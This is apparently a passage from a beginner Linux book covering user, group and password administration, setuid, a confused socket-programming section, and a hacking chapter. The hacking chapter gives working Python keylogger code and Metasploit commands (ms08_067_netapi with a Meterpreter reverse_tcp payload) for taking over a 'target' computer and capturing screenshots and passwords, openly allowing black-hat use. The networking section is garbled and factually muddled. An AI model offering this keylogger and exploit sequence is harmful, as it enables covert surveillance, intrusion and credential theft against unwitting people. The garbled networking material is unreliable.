Every operating system has one user known as the superuser, who has all access and rights on that system. In Windows-based operating systems, you may have heard of this superuser as the administrator. In Linux-based operating systems, the superuser is known as the root user. The root user has the power to override any normal privileges on the file system and is generally used to administer and manage the system. If you want to perform tasks such as installing new software or removing existing software, or managing files and directories in the system, a user will have to escalate privileges to the root user. Most devices on an operating system can be controlled only by the root user, but there are a few exceptions. A normal user gets to control removable devices such as a USB drive. A non-root user can, therefore, manage and remove files on a removable device, but modifications to a fixed hard drive are possible only for the root user.
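Going back to the /etc/passwd and /etc/group formats described above, the fields are easy to pull apart with cut and awk. To keep the sketch self-contained, it runs on a small sample file in /etc/passwd format rather than the real one (the user names are invented):

```shell
# A two-line sample in /etc/passwd format.
printf 'root:x:0:0:root:/root:/bin/bash\njan:x:1000:1000:Jan Doe:/home/jan:/bin/bash\n' > /tmp/passwd_sample

cut -d: -f1,3,7 /tmp/passwd_sample              # username, UID and shell (fields 1, 3, 7)
awk -F: '$3 == 0 {print $1}' /tmp/passwd_sample # which account has UID 0? root

rm /tmp/passwd_sample
```

The same field-splitting approach works on /etc/group, whose last field is the comma-separated membership list.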

But as we have heard, with great power comes great responsibility. Given the unlimited powers that the root user has, those powers can be used to damage the system as well. A root user can delete files and directories, remove or modify user accounts, create backdoors in the system, and so on. If the root account gets compromised, someone else gains full control over the system. Therefore, it is always advisable to log in as a normal user and escalate privileges to the root user only when absolutely required.

The root account on a Linux operating system is the equivalent of the local Administrator account on Windows operating systems. It is common practice in Linux to log in as a regular user and then use tools to gain certain privileges of the root account.

Using su to Switch Users

You can switch to a different user account in Linux using the su command. If you do not pass a username as an argument to the su command, it is implied that you want to switch to the root user account. If you invoke the command as a regular user, you will be prompted to enter the password of the account that you want to switch to. However, if you invoke the command as the root user, you will not need to enter the password of the account that you are switching to.

su -
[user@host ~]$ su
Password: rootpassword
[root@host ~]#

If you use the command su username, it will start a session in a non-login shell. But if you use the command as su - username, a login shell is initiated for the user. This means that su - username sets up a new and clean login environment for the new user, whereas su username retains the settings of the current shell. To get the new user's default settings, administrators usually use the su - command.

sudo and the root

There is a very strict privilege model implemented in Linux operating systems. The root user has the power to do everything, while the other users can do nothing that is related to the system.
The common solution, which was

followed in the past was to allow the normal user to become the root user using the su command for a temporary period until the required task was completed. This, however, has the disadvantage that a regular user literally becomes the root user and gains all the powers of the root user. They could then make critical changes to the system, such as restarting it, or even delete an entire directory like /etc. Gaining root access this way also poses another issue: every user switching to the root user would need to know the root password, which is not a very good idea. This is where the sudo command comes into the picture.

The sudo command lets a regular user run commands as if they were the root user, or another user, as per the settings defined in the /etc/sudoers file. While other tools like su require you to know the password of the root user, the sudo command requires you to know only your own password for authentication, not the password of the account that you are trying to gain access to. This allows the administrator of the system to grant a certain list of privileges to regular users so that they can perform system administration tasks without actually needing to know the root password.

Let us see an example where the student user has been granted access through sudo to run the usermod command. With this access, the student user can now modify any other user account and lock that account:

[student@host ~]$ sudo usermod -L username
[sudo] password for student: studentpassword

Another benefit of using sudo is that all commands that any user runs using sudo are logged to /var/log/secure.

Managing User Accounts

In this section, you will learn how to create, modify, lock, and delete user accounts that are defined locally in the system. There are a lot of tools available on the command line which can be invoked to manage local user accounts.
Let us go through them one by one and understand what they do.

● useradd username creates a new user with the specified username and sets default parameters for the user in the /etc/passwd file when the command is run without any options. However, the command will not set any default password for the new user, and therefore the user will not be able to log in until a password has been set for them. Running useradd --help will give you a list of options that can be specified for the useradd command; using these will override the default parameters of the user in the /etc/passwd file. For a few of these options, you can also use the usermod command to modify existing users. Certain parameters for the user, such as the password aging policy or the range of the UID numbers, are read from the /etc/login.defs file. This file only comes into the picture while creating new users; modifying it will not make any changes to existing users on the system.

● usermod --help will display all the basic options that you can use with this command to manage user accounts. Let us go through these in brief:

-c, --comment COMMENT

This option is used to add a value, such as the user's full name, to the GECOS field

-g, --gid GROUP

The primary group of the user can be specified using this option

-G, --groups GROUPS

Associate one or more supplementary groups with the user

-a, --append

This option is used with the -G option to add the user to the specified supplementary groups without removing the user from their other groups

-d, --home HOME_DIR

This option allows you to specify a new home directory for the user

-m, --move-home

Used together with the -d option, this moves the content of the user's home directory to the new location

-s, --shell SHELL

The login shell of the user is changed using this option

-L, --lock

Lock a user account using this option

-U, --unlock

Unlock a user account using this option
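All of the fields these options modify live in the user's /etc/passwd entry, so it is easy to check the current values before changing them. A small sketch, using root since that account exists on every Linux system:

```shell
# Print the home directory and shell fields for a given user from /etc/passwd.
user=root
awk -F: -v u="$user" '$1 == u { print "home=" $6, "shell=" $7 }' /etc/passwd
```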

● userdel username deletes the user from the /etc/passwd file but does not delete the home directory of that user. userdel -r username deletes the user from /etc/passwd and deletes their home directory along with its contents as well.

● id displays the details of the current user, including the UID and group memberships. id username will display the same details for the specified user.

● passwd username is a command that can be used to set the user's initial password or modify the user's existing password. The root user has the power to set the password to any value: if the criteria for password strength are not met, a warning message will appear, but the root user can retype the same password and set it for the given user anyway. A regular user, on the other hand, will need to select a password that is at least 8 characters long and is not the same as the username, a previous password, or a word that can be found in the dictionary.

● UID Ranges are ranges that are reserved for specific purposes in Red Hat Enterprise Linux 7. UID 0 is always assigned to the root user. UIDs 1-200 are assigned by the system to system processes in a static manner. UIDs 201-999 are assigned to system processes that do not own any files in the system; they are dynamically assigned whenever installed software requests a process. UIDs 1000 and above are assigned to regular users of the system.
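The ranges above can be captured in a small helper function; the name classify_uid and the exact messages are our own, but the boundaries mirror the Red Hat Enterprise Linux 7 defaults just described:

```shell
# Classify a UID according to the RHEL 7 ranges described above.
classify_uid() {
  if   [ "$1" -eq 0 ];   then echo "root"
  elif [ "$1" -le 200 ]; then echo "statically assigned system process"
  elif [ "$1" -le 999 ]; then echo "dynamically assigned system process"
  else                        echo "regular user"
  fi
}
classify_uid 0       # root
classify_uid 1000    # regular user
```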

Managing Group Accounts

In this section, we will learn how to create, modify, and delete group accounts that have been created locally. A group must already exist before you can add users to it. There are many tools available on the Linux command line that will help you manage local groups. Let us go through the commands used for groups one by one.

● groupadd groupname, if used without any options, creates a new group and assigns it the next available GID from the group range defined in the /etc/login.defs file. You can specify a GID by using the option -g GID:

[user@host ~]$ sudo groupadd -g 5000 ateam

The -r option will create a system-specific group and assign it a GID belonging to the system range, which is also defined in the /etc/login.defs file:

[user@host ~]$ sudo groupadd -r professors

● groupmod is used to modify the parameters of an existing group, such as changing the mapping of the group name to the GID. The -n option is used to give the group a new name:

[user@host ~]$ sudo groupmod -n professors lecturers

The -g option is passed along with the command if you want to assign a new GID to the group:

[user@host ~]$ sudo groupmod -g 6000 ateam

● groupdel is used to delete a group.

[user@host ~]$ sudo groupdel ateam

groupdel may not work on a group that is the primary group of a user. Just as with userdel, you need to be careful with groupdel: check that no files owned by the group are left behind on the system after deleting it.

● usermod is used to modify the group membership of a user. You can change a user's primary group with usermod -g groupname username:

[user@host ~]$ sudo usermod -g student student

You can add a user to a supplementary group using the usermod -aG groupname username command:

[user@host ~]$ sudo usermod -aG wheel student

Using the -a option ensures that modifications to the user are done in append mode. If you do not use it, the user will be removed from all other supplementary groups and only added to the new group.

User Password Management

In this section, we will learn about the shadow password file and how you can use it to manually lock accounts or apply password-aging policies to an account.

In the initial days of Linux development, the encrypted password for a user was stored in the /etc/passwd file, which is world-readable. This was considered a secure approach until attackers started using dictionary attacks on the encrypted passwords. It was then decided to move the encrypted password hash to a more secure location, the /etc/shadow file. The modern implementation also allows you to set password-aging and expiration policies through this file.

A modern password hash has three pieces of information in it. Consider the following password hash:

$1$gCLa2/Z$6Pu0EKAzfCjxjv2hoLOB/

1: This part specifies the hashing algorithm used. The number 1 indicates that an MD5 hash has been used; the number 6 appears when a SHA-512 hash is used.

gCLa2/Z: This is the salt used to encrypt the hash. It is chosen at random when the password is set. The combination of the unencrypted password and the salt together forms the encrypted hash. The advantage of having a salt is that two users who happen to use the same password will not have identical hash entries in the /etc/shadow file.

6Pu0EKAzfCjxjv2hoLOB/: This is the encrypted hash.

When a user tries to log in to the system, the system looks up their entry in the /etc/shadow file.
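The three sections of the example hash can be pulled apart on the $ delimiter; this sketch uses the same illustrative hash from the text:

```shell
hash='$1$gCLa2/Z$6Pu0EKAzfCjxjv2hoLOB/'
rest=${hash#\$}        # drop the leading $
IFS='$'
set -- $rest           # split the remainder on the $ delimiters
unset IFS
echo "algorithm=$1"    # 1 = MD5, 6 = SHA-512
echo "salt=$2"
echo "encrypted hash=$3"
```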
It then combines the unencrypted password entered by the user with the salt for the user and uses the hash algorithm

specified to encrypt this combination. If this hash matches the hash stored in the /etc/shadow file, it is implied that the password typed by the user is correct. Otherwise, the user has typed in the wrong password and the login attempt fails. This method is secure because it allows the system to determine whether a user typed the correct password without having to store the actual unencrypted password on the file system.

The format of the /etc/shadow file is as below. There are 9 fields for every user, as follows:

name:password:lastchange:minage:maxage:warning:inactive:expire:blank

name: This needs to be a valid username on the system, through which the user logs in.

password: This is where the encrypted password of the user is stored. If the field starts with an exclamation mark, it means that the password is locked.

lastchange: This is the timestamp of the last password change for the account, stored as days since January 1, 1970.

minage: This defines the minimum number of days before a password can be changed. The number 0 means there is no minimum age.

maxage: This defines the maximum number of days before a password must be changed.

warning: This is the warning period signaling that the password is going to expire. The number 0 means that no warning will be given before password expiry.

inactive: This is the number of days the account stays active after password expiry. During this period, the user can log in with the expired password and change it. If the user fails to do so within the specified number of days, the account is locked and becomes inactive.

expire: This is the date when the account is set to expire, also stored as days since January 1, 1970.

blank: This is a blank field, which is reserved for future use.

Password Aging

Password aging is a technique that is employed by system administrators to safeguard against bad passwords, which are set by users of an organization. The

policy basically sets a number of days, 90 by default, after which a user is forced to change their password. The advantage of forcing a password change is that even if someone has gained access to a user's password, they will have it only for a limited amount of time. The downside of this approach is that users will tend to write their password down somewhere, since they cannot memorize it if they keep having to change it.

In Red Hat Enterprise Linux 7, there are two ways through which password aging can be enforced:

1. Using the chage command on the command line
2. Using the User Management application in the graphical interface

The chage command with the -M option lets a system administrator specify the number of days for which a password is valid. Let us look at an example:

[user@host ~]$ sudo chage -M 90 alice

In this command, the password validity for the user alice is set to 90 days, after which the user will be forced to reset their password. If you want to effectively disable password aging, you can specify the -M value as 99999, which is equivalent to roughly 273 years.

You can set password aging policies using the graphical user interface as well. There is an application called User Manager, which you can access from the Main Menu Button > System Settings > Users & Groups. Alternatively, you can type the command system-config-users in the terminal window. When the User Manager window pops up, navigate to the Users tab, select the required user from the list, and click on the Properties button, where you can set the password aging policy.

Access Restriction

You can set the expiry date for an account using the chage command. The user will not be allowed to log in to the system once that date is reached. You can use the usermod command with the -L option to lock a particular user account:

[user@host ~]$ sudo usermod -L alice
[user@host ~]$ su - alice

Password: alicepassword
su: Authentication failure

The usermod command is useful to lock and expire an account at the same time, for example when an employee has left the company:

[user@host ~]$ sudo usermod -L -e 1 alice

A user cannot authenticate to the system using a password once their account has been locked. It is one of the best practices to prevent authentication by an employee who has already left the organization. You can use the usermod -U username command later to unlock the account, in the event that the employee rejoins the organization. If the account was also in an expired state, you will need to make sure to set a new expiry date for the account as well.

The nologin shell

There will be instances where you want to create a user who can authenticate with a password but does not need an interactive shell on the system. For example, a mail server may require a user to have an email account so that the user can log in and check their emails, but that user does not need a shell login on the system itself. This is where the nologin shell comes in as a solution. We simply set the shell for this user to point to /sbin/nologin. Once this is done, the user cannot log in to the system using the direct login procedure:

[root@host ~]# usermod -s /sbin/nologin student
[root@host ~]# su - student
Last login: Tue Mar 5 20:40:34 GMT 2015 on pts/0
This account is currently not available.

By using the nologin shell for a user, you are denying that user interactive login to the system, but not all access to the system. The user will still be able to use certain services, such as web applications or file transfer applications, to upload or download files.
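Coming back to the /etc/shadow fields covered earlier: lastchange and expire are stored as day counts since January 1, 1970, and can be turned into a readable date. This sketch assumes GNU date, which is standard on Linux:

```shell
# Convert a shadow-style day count (days since 1970-01-01) to a calendar date.
days_to_date() {
  date -u -d "1970-01-01 UTC + $1 days" +%F
}
days_to_date 18000    # prints 2019-04-14
```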

Chapter 11 Learning Linux Security Techniques

To help you gain better security and make sure your OS always stays in a "healthy" state, it is best to take note of the commands and concepts given below.

Cross Platforms

You can also do cross-platform socket programming that targets both Linux and Windows. For the Windows side, keep the following in mind: windows.h and winsock.h are used as the header files; closesocket() has to be used instead of close(); send() and recv() are used instead of read() or write(); and WSAStartup() is used to initialize the library.

Host Resolutions

One thing to keep in mind here is that you should use gethostname() so that the standard library can make the right call. This also applies when you are trying to look up the name of a certain part of the program, and when you want to use it in larger applications. It is much the same as in Python.

Linux Sockets

What you have to understand about Linux networking is that it follows the Open Systems Interconnection (OSI) and Internet models, and programs communicate through sockets. To establish connections, you make use of a listening socket so that hosts can make calls, or in other words, connections. bind() associates the socket with an address and port, listen() marks it as a listening socket, and accept() blocks until a client connects. For this, you can keep the following flow in mind:

Server: socket() → bind() → listen() → accept() → read() → write() → read()
Send request: write() → read()
Receive reply: write() → read()
Establish connection: connect() → accept()
Close connection: close() → read()

Client: socket() → connect() → write() → read() → close()

Understanding basic Linux security

Construct and Destruct

These are tied to the socket descriptor and allow peer TCP ports and peer IP addresses to show up onscreen. Take note that, unlike some of its contemporaries on Linux, this uses C++ rather than other languages. Destructors are then able to close any connections that you have made. For example, when you log out of one of your social networking accounts, you are able to do so because destructors are around.

Linux and SMTP Clients

As for an SMTP client, you can expect that it involves some of the same pieces as above, with just a few adjustments. Keep in mind that it is all about opening the socket, opening input and output streams, reading and writing the socket, and lastly, cleaning the client portal up. You also have to know that it involves the following:

Datagram Communication. Local sockets go to work every time your portal sends datagrams to various clients and servers.
Linux Communications. This time, both stream and datagram communication are involved.
Programming Sockets. And of course, you can expect that you will program sockets in the right manner!

Echo Client Set-ups

In Linux, echo clients work by inserting arguments inside socket(); this means you will use IP together with the PF_INET address family so that both go into the TCP socket. To set up a proper client structure, just remember that you have to make a couple of adjustments to the earlier code.

Linux and its Sockets

You also have to understand that you can code for Linux in C mainly because both involve the use of sockets. The socket works like a bridge that binds the client to the port, and it is also responsible for sending the right kinds of requests to the server while waiting for it to respond. Finally, sending and receiving of data is done.

At the same time, the Linux socket API is also able to create a socket for the server, which then binds itself to the port. During that stage, you can begin listening to client traffic as it builds up. You can also wait for the client at that point and, finally, see the sending and receiving of data happen. Its other parameters and functions are the following:

socket_description. This allows the description of both the client and the server to show up onscreen.
write buffer. This describes the data that needs to be sent.
write buffer length. To write the buffer length, you will have to see the string's output.
client_socket. The socket description will also show on top.
address. This is used for the connect function so that address_len would be on top.
address_len. If the second parameter is null, this would appear onscreen.
return. This helps return the description of both the client and the socket. It also makes interaction easy between the client and the server.
server_socket. This is the description of the socket that is located on top.
backlog. This is the number of requests that have not yet been dealt with.

You can also put in personal comments every once in a while, but definitely not all the time!

Understanding advanced Linux security

Internet Protocol is all about providing boundaries in the network, as well as relaying datagrams that allow inter-networking to happen. An IP packet consists of a header and a payload, where the header carries the IP addresses, with interfaces that are connected with the help of certain parameters. Routing prefixes and network designation are also involved, together with interior and exterior gateway protocols. Reliability depends on end-to-end protocols, but mostly you can expect the framework to look this way:

UDP Header | UDP Data → Transport
IP Header | IP Data → Internet
Frame Header | Frame Data | Frame Footer → Link

Data → Application

Getting Peer Information

In order to get peer information, you have to make sure that you return both TCP and IP information. This way, you can be sure that both server and client are connected to the network. You can also use the getpeername() socket call so that when information is available, it can easily be captured and saved. This provides the right data to be sent and received by the various methods involved in Linux, and also contains proper socket descriptors and grants privileges to others in the program. Some may even be deemed private, to make the experience better for the users. To accept information, let the socket TCPAcceptor::accept() be prevalent in the network. This way, you can differentiate actions coming from the server and the client.

All Linux distros come with a robust selection of applications that you can use for almost all of your daily computing needs. Almost all of these applications are easily accessible using your distro's GUI desktop. In this chapter, you will get to know some of the most common Linux applications and learn how to access them whenever you want to. You will also get to know some of the file managers used by different GUIs, which will allow you to make changes or browse files on your computer. Almost all applications used by Linux have dedicated websites on which you can find detailed information about them, including details on where and how to download them.
At the same time, all distros come with different sets of utilities and apps that you can choose to install as you set up your chosen distro. If an app is missing in a Debian or Debian-based distro such as Ubuntu, you can easily get that application as long as you have a high-speed

internet connection.

Enhancing Linux security with SELinux

Technically speaking, Linux is not an operating system per se; the distros that are based on the Linux kernel are. Linux is supported by the larger Free/Libre/Open Source Software community, a.k.a. FLOSS. This community has also been essential to Security-Enhanced Linux (SELinux), the mandatory access control framework that has shipped with the mainline kernel since the 2.6 series, with its access policies continuing to mature in modern releases such as kernel 4.0 from 2015. The code base has grown exponentially in length since its development.

Before you get started with programming on Linux, you need to have a clear idea of what your goals are. If your goal is to make money, you can create apps that are sold for a fee. If your goal is to contribute to the community, you need to figure out what particular niche you can help fill. If you are running a large business, you may want to hire a small army of tech personnel to create patches and applications that will help to better run your business's software. A goal is not something that a book can give you; it is something that you have to come up with yourself. What the rest of this book will give you is some of the basic know-how that you will need to get started with making those goals regarding Linux attainable.
There is a permission setting that can be seen as a threat to security, called setuid or suid (set user ID). This permission setting applies to files that you can run, that is, executable files. When the setuid/suid permission is enabled, a file is executed under its owner's user ID. In short, if the suid permission is on and the file is owned by the root user, the program runs as the root user regardless of who actually launched it. This also means that the suid permission can allow the program to perform more functions than the owner intends other users to perform. Note, too, that if a program carrying the suid permission has security vulnerabilities, criminal hackers can create even more havoc through it. To find all files with suid permissions enabled, you can use the find command like this:
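The command itself did not survive in this copy of the text; a commonly used form (the starting directory is up to you, and scanning all of / is also typical) looks like this:

```shell
# List regular files with the setuid bit (mode bit 4000) under /usr/bin.
# A system-wide scan would be: find / -type f -perm -4000 2>/dev/null
find /usr/bin -maxdepth 1 -type f -perm -4000
```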

After entering this command, you will see a list of files that appears like this example:

Take note that numerous programs are set with the suid permission because they require it. However, you may want to check the entire list to make sure that there are no programs with odd suid permissions; for example, you probably do not want suid programs located in your home directory. Here is an example: typing ls -l /bin/su will give you the following result:
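The listing did not survive in this copy either; on a typical system it looks something like the hypothetical line in the comment below (owner, size, and date will vary), and the suid bit can be spotted by checking the fourth character of the mode string:

```shell
# Hypothetical output of `ls -l /bin/su`:
#   -rwsr-xr-x 1 root root 32208 Mar  5  2015 /bin/su
# The 's' in the owner's execute position marks the setuid bit.
mode='-rwsr-xr-x'
if [ "$(echo "$mode" | cut -c4)" = "s" ]; then
  echo "setuid bit is set"
else
  echo "setuid bit is not set"
fi
```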

The character s in the permission setting allotted to the owner (it appears as -rws) shows that the file /bin/su has the suid permission. This means that the su command, which allows a user to gain superuser privileges, can be run by anyone.

Chapter 12 Some Basic Hacking with Linux

Now that you have hopefully gotten used to the Linux system and have some idea of how it works, it is a good time to learn a little about hacking with Linux. Whether you are using this system on your own or have it set up on a network with other people, there are a few types of hacking that you may find useful to know how to do. This chapter explores some basic hacking endeavors on the Linux system and how Linux can help us complete the ethical hacking that we would like to do. While we are able to do some hacking with the help of Windows and Mac, the best operating system to help us with all of this is often Linux. It already works on the command line, which makes things a bit easier, and it has all of the protection that you need as well.

There are a lot of reasons that hackers enjoy working with Linux over some of the other operating systems out there. The first benefit is that it is open source. This means that the source code is right there, available for you to use and modify without having to pay fees or worry that doing so will get you into trouble. This openness also allows you to gain more access to the system, share it with others, and much more. All of this is beneficial to someone who is ready to get started with hacking.

The compatibility that comes with Linux is beneficial for a hacker as well. This operating system is unique in that it supports all of the software packages of Unix, and it is also able to support all of the common file formats that come with them. This is important when it comes to working with some of the hacking code that we will write later on.

Linux is also designed to be fast and easy to install. There were a number of steps that we had to go through in order to get started, but compared to some of the other operating systems there are not that many, and they help you get up and running in as little time as possible. You will quickly notice that most of the distributions that you are able to work

with Linux are going to have installations that are meant to be easy on the user. And also, a lot of the popular distributions of Linux are going to come with tools that will make installing any of the additional software that you want as easy and friendly as possible too. Another thing that you might notice with this is that the boot time of the operating system of Linux is going to be faster than what we see with options like Mac and Windows, which can be nice if you do not want to wait around all of the time. When you are working on some of the hacks that you would like to accomplish, the stability of the program is going to matter quite a bit. You do not want to work with a system that is not all that stable, or that is going to fall apart on you in no time. Linux is not going to have to go through the same periodic reboots like others in order to maintain the level of performance that you would like and it is not going to slow down or freeze up over time if there are issues with leaks in the memory and more. You are also able to use this operating system for a long time to come, without having to worry about it slowing down or running into some of the other issues that the traditional operating systems will need to worry about. For someone who is going to spend their time working with ethical hacking, this is going to be really important as well. It will ensure that you are able to work with an operating system that is not going to slow down and cause issues with the protections that you put in place on it. And you will not have to worry about all of the issues that can come up with it being vulnerable and causing issues down the line as well. It is going to be safe and secure along the way, so that you are able to complete your hacks and keep things safe, without having to worry about things not always working out the way that we would hope. Another benefit that we will spend a bit of time on is how friendly the Linux network is overall. 
Because this operating system is open source and developed by a community over the internet, it manages networking effectively. Its networking commands are easy to learn, and there are lots of libraries that can be used in a network penetration test if you choose to do one. Add on that Linux is reliable, making network backups faster and more dependable, and you can see why so many users love to work with this option.

As a hacker, you will need to spend some of your time multitasking to get all of the work done. A lot of the code you will run in order to do a hack needs more than one thing going at a time, and Linux handles this without the computer freezing on you. In fact, the Linux system was designed to do a lot of things at the same time. This means that if you are doing something large, like finishing a big print job in the background, it will not really slow down the other work that you are doing. And when you need to handle more than one process at the same time, it is easier to do on Linux than on Mac or Windows, which can be a dream for a hacker.

You may also notice that some of the interactions in Linux are not the same as what we find in the other options. For example, the command-line interface introduces us to something new. Linux operating systems are specifically designed around a strong, highly integrated command-line interface, something that the other two operating systems do not have. The reason this is important is that it allows hackers, and other users of Linux, to have more access to and more control over their system.

Next on the list is the fact that Linux is lighter and more portable than the other operating systems out there. This is a great thing because it gives hackers a way to customize live boot disks and drives from any distribution of Linux that they like. The installation is fast, and it does not consume many resources in the process. Linux is lightweight and easy to use while consuming fewer resources overall.
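As a small, concrete illustration of the multitasking described above, any Linux shell can push a long-running job into the background with the '&' operator and keep working while it runs. A minimal sketch, using sleep to stand in for a real job such as a large print run:

```shell
# Start a long-running job (simulated here with sleep) in the background.
sleep 1 &
bg_pid=$!
echo "background job started with PID $bg_pid"

# The shell is immediately free for other work while the job runs.
echo "foreground work continues"

# 'wait' blocks until the background job finishes.
wait "$bg_pid"
echo "background job finished"
```

In an interactive shell, the jobs command lists running background jobs, and fg brings one back to the foreground.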
Maintenance is another important feature to look at when we are trying to do some ethical hacking with a good operating system. Maintaining the Linux operating system is easy. All of the software installs quickly, and every variant of Linux has its own central software repository, which makes it easy for users to search for the software they would like along the way.

There is also a lot of flexibility in this kind of operating system. As a hacker, you are going to need to handle a lot of different tools along the way, and one of the best ways to do this is to work with an operating system that allows some flexibility in the work that you are doing. This is actually one of the most important features of Linux, because it lets us work with embedded systems, desktop applications, and high-performance server applications alike.

As a hacker, you also want to make sure that your costs are as low as possible. No one wants to get into the world of ethical hacking, start messing with some of those codes and processes, and then find out that they have to spend hundreds of dollars to get it all done. This is where the Linux system comes into play. As you can see from our earlier discussion, it is an open-source operating system that we can download free of cost, which lets us get started with the hacking we want to do without worrying about the expense.

If you are working with ethical hacking, then your main goal is to make sure that your computer and all of the personal information that you put into it stays safe and secure. The Linux command line gives you the tools to keep other hackers out, so that you don't have to worry about your finances or other issues along the way. One of the nice things we notice about the Linux operating system is that it is seen as less vulnerable than some of the other options. Most of the operating systems we can choose from today, besides Linux, have a lot of vulnerabilities that someone with malicious intent can attack. Linux, on the other hand, has fewer of these vulnerabilities in place from the beginning.
This makes it a lot nicer to work with and ensures that we can do the work we want on it without a hacker getting in. Linux is seen as one of the most secure of all the operating systems available, and this is good news when you are starting out as an ethical hacker.

The next benefit of the Linux operating system over some of the other options, especially for a hacker, is that it supports most of the programming languages that you might choose to code in. Linux is already set up to work with many of the most popular programming languages, which means that options like Perl, Ruby, Python, PHP, C++, and Java work great here. This is good news for the hacker because it lets them pick out the option that they like. If you already know a coding language, or there is one in particular that you would like to use for the hacking you plan to do, then it is likely that the Linux system can handle it and will make it easy to use.

If you want to spend some of your time hacking, then the Linux system is a good option, and this includes the fact that many of the hacking tools we work with are written for Linux. Popular hacking tools like Nmap and Metasploit have been ported to Windows. However, while they can work with Windows if you want, you will miss out on some of their capabilities when you take them off of Linux. It is often better to leave these hacking tools on Linux. This allows you to get the full use of all of them and all of their capabilities, without worrying about what does and does not work if you try to move them over to a second operating system. These tools were made and designed to work well in Linux, so keeping them there, rather than forcing them into another operating system, lets you get the most out of your hacking needs.

And finally, we can take a quick look at how the Linux operating system takes privacy as seriously as possible. In the past few years, there was a lot of news coverage of the privacy issues that showed up with the Windows 10 operating system.
Windows 10 is set up to collect a lot of data on the people who use it, which raises some concerns about how safe your personal information could be. This is not a problem when we are working with Linux. This system does not take your information, you will not find any talking assistants, and the operating system is not quietly collecting data on you for financial gain. This speaks volumes to an ethical hacker who wants to make sure that their information stays safe and secure all of the time.

As you can see, there are a lot of benefits to working with the Linux system. We can find many examples of this operating system and all of the amazing things it is able to do, even if we don't personally use it on our desktop or laptop. The good news is that there are a lot of features likely to make this operating system even more effective and strong in the future, which is perfect for a lot of tasks, including the hacking techniques that we talked about.

Making a key logger

The first tool we are going to learn how to work with is a key logger. This can be an interesting tool because it lets you see what keystrokes someone is making on a computer. Whether you have a network that you need to keep safe and want to see what others on the system are typing, or you are doing a type of black hat hacking and trying to get information for your own personal use, the key logger is one of the tools that can make this work out easily for you.

There are a few different parts that you will need to add in here. You can find key-logging libraries online (the Python library pyxhook, used in the example below, is one of the easiest to start with on Linux), but while a bare key logger gets you every character typed on a particular computer system, on its own it is not very helpful. Basically, you get each little letter on a different line, with no time stamps or anything else to help you out. It is much better to work this out so that you get the information you actually need, such as whole lines of text rather than each letter on its own line, and a time stamp to tell you when each one was typed.
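To show what that grouping might look like, here is a minimal sketch of the buffering logic in plain Python: keystrokes that arrive close together are collected into one line, and the line is flushed with a time stamp once there is a pause of more than two seconds. The class name and its design are this book's own illustration; wiring it to a key-hook library such as pyxhook is left to the reader.

```python
import time

# Groups keystrokes into time-stamped lines: keys typed close together
# are buffered, and the buffer is flushed once there is a pause longer
# than 'pause' seconds.
class KeystrokeBuffer:
    def __init__(self, pause=2.0):
        self.pause = pause          # seconds of silence that end a "line"
        self.buffer = []            # keys collected so far
        self.last_time = None       # time of the previous keystroke
        self.lines = []             # flushed (timestamp, text) records

    def press(self, key, now=None):
        now = time.time() if now is None else now
        # a long pause means the previous burst of typing is finished
        if self.last_time is not None and now - self.last_time > self.pause:
            self.flush()
        self.buffer.append(key)
        self.last_time = now

    def flush(self):
        if self.buffer:
            stamp = time.strftime('%Y-%m-%d %H:%M:%S',
                                  time.localtime(self.last_time))
            self.lines.append((stamp, ''.join(self.buffer)))
            self.buffer = []
```

Calling press() for 'h' and 'i' in quick succession, then 'o' and 'k' after a three-second pause, records "hi" as one time-stamped line and leaves "ok" buffered until the next flush.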
You can train the system to flush only at certain times, such as when there is a pause longer than two seconds, so that it writes out all the keystrokes of a burst at once rather than splitting them up. A time stamp makes it easier to see when things are happening, and you will soon be able to see patterns, as well as more legible words and phrases. When you are ready to bring all of these pieces together, here is the Python code, using the pyxhook library, that you can run on Linux to get the key logger set up:

import pyxhook

# change this to your log file's path
log_file = '/home/aman/Desktop/file.log'

# this function is called every time a key is pressed
def OnKeyPress(event):
    fob = open(log_file, 'a')
    fob.write(event.Key)
    fob.write('\n')
    fob.close()
    if event.Ascii == 96:  # 96 is the ASCII value of the grave key (`)
        new_hook.cancel()  # pressing ` stops the logger

# instantiate the HookManager class
new_hook = pyxhook.HookManager()
# listen to all keystrokes
new_hook.KeyDown = OnKeyPress
# hook the keyboard
new_hook.HookKeyboard()
# start the session
new_hook.start()

Now you should be able to get a lot of the information that you need to keep track of the keystrokes on the target computer. You will be able to see the words come out in a steady stream that is easier to read, you will get some time stamps, and it shouldn't be too hard to figure out where the target is visiting and what information they are putting in. Of course, this is often better when paired with a few other options, such as taking screenshots and tracking where the target computer's mouse is going in case they click on links rather than typing in the address of the site they are visiting, and we will explore that more now!

Getting screenshots

Now, you can get a lot of information from the keystrokes, but often these just end up being random words with time stamps accompanying

them. Even if you are able to see the username and password that you want, if the target is using a link to navigate to a website, how are you supposed to know where they typed the information you have recorded? While there are a few codes you could use to learn more about what the target is doing, getting screenshots is one of the best ways to do so. It helps you not only get hold of the usernames and passwords in the screenshots that come up, but also see what the target is doing on the screen, making the hack much more effective for you. Don't worry about this sounding too complicated. The code you need is not too difficult, and as long as you are used to the command prompt, you will find it pretty easy to get the screenshots that you want. The steps you need to take are:

Step 1: Set up the hack

First, you will need to select the kind of exploit to use. A good exploit to consider is the MS08_067_netapi exploit. You can load it onto the system by typing:

msf > use exploit/windows/smb/ms08_067_netapi

Once this is loaded, it is time to add a payload that will simplify the screen captures. Metasploit's Meterpreter payload makes this easier to do. To set it up and load it into your exploit, type in the following:

msf > (ms08_067_netapi) set payload windows/meterpreter/reverse_tcp

The following step is to set up the options that you want to use. A good place to start is with the show options command. This command lets you see the options that are available and necessary if you would like to run the hack.
To run the show options command, type:

msf > (ms08_067_netapi) show options

At this point, you should be able to see the IP addresses of the victim (the RHOST) and of the attacker, you (the LHOST). These are important to know when you want to take over the system of another computer, because the target's IP address will let you get right there. The two commands that set your IP address and the target's IP address are:

msf > (ms08_067_netapi) set RHOST 192.168.1.108
msf > (ms08_067_netapi) set LHOST 192.168.1.109

If you have gone through the process correctly, you should now be able to exploit the other computer and put Meterpreter onto it. The target computer is under your control, and you can take the screenshots you want with the following steps.

Step 2: Getting the screenshots

With this step, we are going to get the screenshots that you want. But before we do that, we need to find out the process ID, or PID, that you are using. To do this, type in:

meterpreter > getpid

The screen that comes up next shows the PID you are using on the target's computer. For this example, we will say the PID is 932, but it will vary depending on the target's computer. Now that you have this number, you can check which process it is by getting a list of all the processes with their corresponding PIDs. To do this, just type:

meterpreter > ps

